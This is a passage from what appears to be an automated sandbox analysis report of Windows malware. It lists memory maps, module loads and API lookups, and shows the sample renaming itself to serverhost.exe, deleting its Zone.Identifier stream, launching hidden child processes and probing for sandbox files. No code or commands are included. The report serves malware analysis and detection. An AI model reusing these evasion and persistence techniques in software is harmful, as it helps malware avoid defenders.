pagefile_0x0000000000990000 0x00990000 0x00a6efff Pagefile Backed Memory Readable True False False
private_0x0000000000a70000 0x00a70000 0x00a78fff Private Memory Readable, Writable True True False
private_0x0000000000a70000 0x00a70000 0x00a7cfff Private Memory Readable, Writable True True False
pagefile_0x0000000000a80000 0x00a80000 0x00a96fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000a80000 0x00a80000 0x00a80fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000a90000 0x00a90000 0x00a90fff Pagefile Backed Memory Readable True False False
cversions.2.db 0x00aa0000 0x00aa3fff Memory Mapped File Readable True False False
private_0x0000000000ab0000 0x00ab0000 0x00aeffff Private Memory Readable, Writable True True False
private_0x0000000000af0000 0x00af0000 0x00afffff Private Memory Readable, Writable True True False
private_0x0000000000b00000 0x00b00000 0x00bfffff Private Memory Readable, Writable True True False
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db 0x00c00000 0x00c2ffff Memory Mapped File Readable True False False
cversions.2.db 0x00c30000 0x00c33fff Memory Mapped File Readable True False False
ekgeobhbhtp7rxmh.exe 0x00c40000 0x00c5afff Memory Mapped File Readable, Writable, Executable True True False
pagefile_0x0000000000c60000 0x00c60000 0x0185ffff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x01860000 0x01b2efff Memory Mapped File Readable False False False
private_0x0000000001b30000 0x01b30000 0x01b77fff Private Memory Readable, Writable True True False
pagefile_0x0000000001b80000 0x01b80000 0x01b80fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000001b90000 0x01b90000 0x01c8ffff Private Memory Readable, Writable True True False
private_0x0000000001c90000 0x01c90000 0x01cd7fff Private Memory Readable, Writable True True False
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x01ce0000 0x01d45fff Memory Mapped File Readable True False False
private_0x0000000001d90000 0x01d90000 0x01e8ffff Private Memory Readable, Writable True True False
private_0x0000000001f90000 0x01f90000 0x0208ffff Private Memory Readable, Writable True True False
imageres.dll 0x61140000 0x62495fff Memory Mapped File Readable, Writable, Executable False False False
imageres.dll 0x624a0000 0x637f5fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x6eb50000 0x6ebd3fff Memory Mapped File Readable, Writable, Executable False False False
apphelp.dll 0x71510000 0x7155bfff Memory Mapped File Readable, Writable, Executable False False False
windowscodecs.dll 0x735e0000 0x736dafff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x739d0000 0x73a0ffff Memory Mapped File Readable, Writable, Executable False False False
wtsapi32.dll 0x74180000 0x7418cfff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x742b0000 0x7444dfff Memory Mapped File Readable, Writable, Executable False False False
propsys.dll 0x74600000 0x746f4fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x74800000 0x74820fff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x74af0000 0x74b06fff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x74e70000 0x74e85fff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75320000 0x7533afff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75340000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x753f0000 0x753fafff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x75460000 0x7546bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75470000 0x754b9fff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x754c0000 0x754e6fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x755b0000 0x756ccfff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x756d0000 0x756e1fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x756f0000 0x75708fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75710000 0x757b0fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x757c0000 0x7588bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x764f0000 0x7658ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76590000 0x76663fff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x766f0000 0x76772fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76780000 0x7682bfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76840000 0x7688dfff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76890000 0x76958fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x769a0000 0x76b3cfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76b40000 0x76b96fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76ba0000 0x76c2efff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x76c60000 0x76e5afff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76e60000 0x76efcfff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76f00000 0x77035fff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x77040000 0x77134fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77140000 0x7729bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x772a0000 0x773dbfff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77400000 0x7741efff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x77420000 0x77464fff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x774e0000 0x774e0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffd6000 0x7ffd6000 0x7ffd6fff Private Memory Readable, Writable True True False
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory Readable, Writable True True False
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory Readable, Writable True True False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True True False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True True False
Host Behavior
File (13)
+
Operation Filename Additional Information Success Count Logfile
Create C:\email.doc desired_access = GENERIC_READ False 1
Fn
Create C:\a\foobar.bmp desired_access = GENERIC_READ False 1
Fn
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe type = size True 1
Fn
Get Info C:\ type = file_attributes True 1
Fn
Get Info C:\Users\ type = file_attributes True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\ type = file_attributes True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\ type = file_attributes True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\ type = file_attributes True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\ type = file_attributes True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ type = file_attributes True 1
Fn
Move C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe source_filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe True 1
Fn
Delete C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe:Zone.Identifier False 1
Fn
Process (1)
+
Operation Process Additional Information Success Count Logfile
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe os_pid = 0xc04, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE True 1
Fn
Module (44)
+
Operation Module Additional Information Success Count Logfile
Load USER32.dll base_address = 0x76890000 True 1
Fn
Load KERNEL32.dll base_address = 0x76590000 True 2
Fn
Load ADVAPI32.dll base_address = 0x764f0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x76b40000 True 1
Fn
Load ntdll.dll base_address = 0x772a0000 True 1
Fn
Load advapi32.dll base_address = 0x764f0000 True 1
Fn
Load ole32.dll base_address = 0x77140000 True 1
Fn
Load shell32.dll base_address = 0x758a0000 True 1
Fn
Load crypt32.dll base_address = 0x755b0000 True 1
Fn
Load urlmon.dll base_address = 0x76f00000 True 1
Fn
Load userenv.dll base_address = 0x74af0000 True 1
Fn
Load wininet.dll base_address = 0x77040000 True 1
Fn
Load wtsapi32.dll base_address = 0x74180000 True 1
Fn
Get Handle c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe base_address = 0xc40000 True 1
Fn
Get Filename c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, size = 259 True 1
Fn
Get Filename process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, size = 260 True 2
Fn
Get Address c:\windows\system32\user32.dll function = ReleaseCapture, address_out = 0x768c69f2 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetProcessWindowStation, address_out = 0x7689dfdc True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetCaretBlinkTime, address_out = 0x768a0d01 True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x2ef59c True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x2ef5bc True 1
Fn
Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x2ef69c True 1
Fn
Get Address function = GetProcAddress, ordinal = 0, address_out = 0x2ef69c True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x2ef69c True 1
Fn
Get Address function = VirtualProtect, ordinal = 0, address_out = 0x2ef69c True 1
Fn
Get Address function = UnmapViewOfFile, ordinal = 0, address_out = 0x2ef69c True 1
Fn
Get Address function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x2ef69c True 1
Fn
Get Address function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x2ef69c True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleFileNameA, address_out = 0x765e33f6 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameA, address_out = 0x765c6ba9 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CloseHandle, address_out = 0x765dca7c True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = lstrcmpA, address_out = 0x765c8c59 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FreeConsole, address_out = 0x7663bfde True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameExA, address_out = 0x7661f41f True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleHandleA, address_out = 0x765dcf41 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateFileA, address_out = 0x765dcee8 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = GetUserNameA, address_out = 0x7651a4b4 True 1
Fn
Get Address c:\windows\system32\shlwapi.dll function = StrStrIA, address_out = 0x76b4d250 True 1
Fn
Get Address c:\windows\system32\ntdll.dll function = strchr, address_out = 0x772e7690 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b True 1
Fn
Create Mapping C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Map C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, desired_access = FILE_MAP_READ True 1
Fn
Service (1)
+
Operation Additional Information Success Count Logfile
Open Manager database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
System (7)
+
Operation Additional Information Success Count Logfile
Get Computer Name result_out = F71GWAT True 2
Fn
Get Computer Name result_out = F71gwat, type = ComputerNameDnsHostname True 1
Fn
Get Time type = Ticks, time = 104973 True 1
Fn
Get Time type = Ticks, time = 105987 True 1
Fn
Get Time type = Ticks, time = 106985 True 1
Fn
Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Mutex (4)
+
Operation Additional Information Success Count Logfile
Create mutex_name = MB66D4A35 True 1
Fn
Create mutex_name = Global\I78B95E2E True 1
Fn
Create mutex_name = Global\M78B95E2E True 1
Fn
Release mutex_name = Global\I78B95E2E True 1
Fn
Process #10: serverhost.exe
(Host: 40, Network: 0)
+
Information Value
ID #10
File Name c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe
Command Line "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe"
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:01:14, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:01:11
OS Process Information
+
Information Value
PID 0xc04
Parent PID 0xbec (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x C08
0x C10
0x C14
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
locale.nls 0x00040000 0x000a6fff Memory Mapped File Readable False False False
private_0x00000000000b0000 0x000b0000 0x000b0fff Private Memory Readable, Writable True True False
pagefile_0x00000000000c0000 0x000c0000 0x000c6fff Pagefile Backed Memory Readable True False False
private_0x00000000000d0000 0x000d0000 0x001cffff Private Memory Readable, Writable True True False
pagefile_0x00000000001d0000 0x001d0000 0x001d1fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000001e0000 0x001e0000 0x001effff Private Memory Readable, Writable True True False
pagefile_0x00000000001f0000 0x001f0000 0x001f0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000200000 0x00200000 0x00201fff Pagefile Backed Memory Readable True False False
private_0x0000000000210000 0x00210000 0x0030ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000310000 0x00310000 0x003d7fff Pagefile Backed Memory Readable True False False
windowsshell.manifest 0x003e0000 0x003e0fff Memory Mapped File Readable False False False
pagefile_0x00000000003e0000 0x003e0000 0x003e0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000003f0000 0x003f0000 0x003f1fff Pagefile Backed Memory Readable True False False
rpcss.dll 0x00400000 0x0045bfff Memory Mapped File Readable False False False
private_0x0000000000400000 0x00400000 0x004affff Private Memory Readable, Writable True True False
private_0x0000000000400000 0x00400000 0x00423fff Private Memory Readable, Writable True True False
private_0x0000000000400000 0x00400000 0x00411fff Private Memory Readable, Writable True True False
private_0x0000000000420000 0x00420000 0x0042cfff Private Memory Readable, Writable, Executable True True False
private_0x0000000000430000 0x00430000 0x00430fff Private Memory Readable, Writable True True False
private_0x0000000000440000 0x00440000 0x00448fff Private Memory Readable, Writable True True False
private_0x0000000000440000 0x00440000 0x00451fff Private Memory Readable, Writable True True False
private_0x0000000000450000 0x00450000 0x00458fff Private Memory Readable, Writable True True False
private_0x0000000000460000 0x00460000 0x0046cfff Private Memory Readable, Writable True True False
private_0x0000000000470000 0x00470000 0x004affff Private Memory Readable, Writable True True False
private_0x00000000004c0000 0x004c0000 0x004cffff Private Memory Readable, Writable True True False
pagefile_0x00000000004d0000 0x004d0000 0x005d0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000005e0000 0x005e0000 0x009d2fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000009e0000 0x009e0000 0x00abefff Pagefile Backed Memory Readable True False False
private_0x0000000000ac0000 0x00ac0000 0x00ae3fff Private Memory Readable, Writable True True False
private_0x0000000000ac0000 0x00ac0000 0x00ad1fff Private Memory Readable, Writable True True False
private_0x0000000000b00000 0x00b00000 0x00bfffff Private Memory Readable, Writable True True False
serverhost.exemh.exe 0x00c40000 0x00c5afff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000c60000 0x00c60000 0x0185ffff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x01860000 0x01b2efff Memory Mapped File Readable False False False
private_0x0000000001b30000 0x01b30000 0x01b77fff Private Memory Readable, Writable True True False
private_0x0000000001b80000 0x01b80000 0x01c7ffff Private Memory Readable, Writable True True False
private_0x0000000001c80000 0x01c80000 0x01d7ffff Private Memory Readable, Writable True True False
private_0x0000000001d80000 0x01d80000 0x01dc7fff Private Memory Readable, Writable True True False
imageres.dll 0x61140000 0x62495fff Memory Mapped File Readable, Writable, Executable False False False
imageres.dll 0x624a0000 0x637f5fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x6eb50000 0x6ebd3fff Memory Mapped File Readable, Writable, Executable False False False
apphelp.dll 0x71510000 0x7155bfff Memory Mapped File Readable, Writable, Executable False False False
windowscodecs.dll 0x735e0000 0x736dafff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x739d0000 0x73a0ffff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x742b0000 0x7444dfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75320000 0x7533afff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75340000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75470000 0x754b9fff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x754c0000 0x754e6fff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x756d0000 0x756e1fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x756f0000 0x75708fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75710000 0x757b0fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x757c0000 0x7588bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x764f0000 0x7658ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76590000 0x76663fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76780000 0x7682bfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76840000 0x7688dfff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76890000 0x76958fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x769a0000 0x76b3cfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76b40000 0x76b96fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76ba0000 0x76c2efff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76e60000 0x76efcfff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77140000 0x7729bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x772a0000 0x773dbfff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77400000 0x7741efff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x774e0000 0x774e0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory Readable, Writable True True False
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory Readable, Writable True True False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True True False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True True False
Host Behavior
File (2)
+
Operation Filename Additional Information Success Count Logfile
Create C:\email.doc desired_access = GENERIC_READ False 1
Fn
Create C:\a\foobar.bmp desired_access = GENERIC_READ False 1
Fn
Process (1)
+
Operation Process Additional Information Success Count Logfile
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe os_pid = 0xc18, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE True 1
Fn
Module (33)
+
Operation Module Additional Information Success Count Logfile
Load USER32.dll base_address = 0x76890000 True 1
Fn
Load KERNEL32.dll base_address = 0x76590000 True 2
Fn
Load ADVAPI32.dll base_address = 0x764f0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x76b40000 True 1
Fn
Load ntdll.dll base_address = 0x772a0000 True 1
Fn
Get Handle c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exemh.exe base_address = 0xc40000 True 1
Fn
Get Filename c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exemh.exe process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 259 True 1
Fn
Get Filename process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\user32.dll function = ReleaseCapture, address_out = 0x768c69f2 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetProcessWindowStation, address_out = 0x7689dfdc True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetCaretBlinkTime, address_out = 0x768a0d01 True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x1cf74c True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x1cf76c True 1
Fn
Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x1cf84c True 1
Fn
Get Address function = GetProcAddress, ordinal = 0, address_out = 0x1cf84c True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x1cf84c True 1
Fn
Get Address function = VirtualProtect, ordinal = 0, address_out = 0x1cf84c True 1
Fn
Get Address function = UnmapViewOfFile, ordinal = 0, address_out = 0x1cf84c True 1
Fn
Get Address function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x1cf84c True 1
Fn
Get Address function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x1cf84c True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleFileNameA, address_out = 0x765e33f6 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameA, address_out = 0x765c6ba9 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CloseHandle, address_out = 0x765dca7c True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = lstrcmpA, address_out = 0x765c8c59 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FreeConsole, address_out = 0x7663bfde True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameExA, address_out = 0x7661f41f True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleHandleA, address_out = 0x765dcf41 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateFileA, address_out = 0x765dcee8 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = GetUserNameA, address_out = 0x7651a4b4 True 1
Fn
Get Address c:\windows\system32\shlwapi.dll function = StrStrIA, address_out = 0x76b4d250 True 1
Fn
Get Address c:\windows\system32\ntdll.dll function = strchr, address_out = 0x772e7690 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b True 1
Fn
System (2)
+
Operation Additional Information Success Count Logfile
Get Computer Name result_out = F71GWAT True 1
Fn
Get Computer Name result_out = F71gwat, type = ComputerNameDnsHostname True 1
Fn
Mutex (1)
+
Operation Additional Information Success Count Logfile
Create mutex_name = MA991ED3B True 1
Fn
Process #11: serverhost.exe
(Host: 170, Network: 22)
+
Information Value
ID #11
File Name c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe
Command Line "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe"
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:01:16, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:01:09
OS Process Information
+
Information Value
PID 0xc18
Parent PID 0xc04 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x C1C
0x C20
0x C24
0x C28
0x C2C
0x C30
0x C34
0x C38
0x C3C
0x C40
0x C44
0x C48
0x C4C
0x C60
0x C70
0x C74
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
locale.nls 0x00040000 0x000a6fff Memory Mapped File Readable False False False
pagefile_0x00000000000b0000 0x000b0000 0x00177fff Pagefile Backed Memory Readable True False False
private_0x0000000000180000 0x00180000 0x00180fff Private Memory Readable, Writable True False False
pagefile_0x0000000000190000 0x00190000 0x00196fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001a0000 0x001a0000 0x001a1fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000001c0000 0x001c0000 0x001c1fff Pagefile Backed Memory Readable True False False
private_0x00000000001d0000 0x001d0000 0x002cffff Private Memory Readable, Writable True False False
pagefile_0x00000000002d0000 0x002d0000 0x003d0fff Pagefile Backed Memory Readable True False False
windowsshell.manifest 0x003e0000 0x003e0fff Memory Mapped File Readable False False False
pagefile_0x00000000003e0000 0x003e0000 0x003e0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000003f0000 0x003f0000 0x003f1fff Pagefile Backed Memory Readable True False False
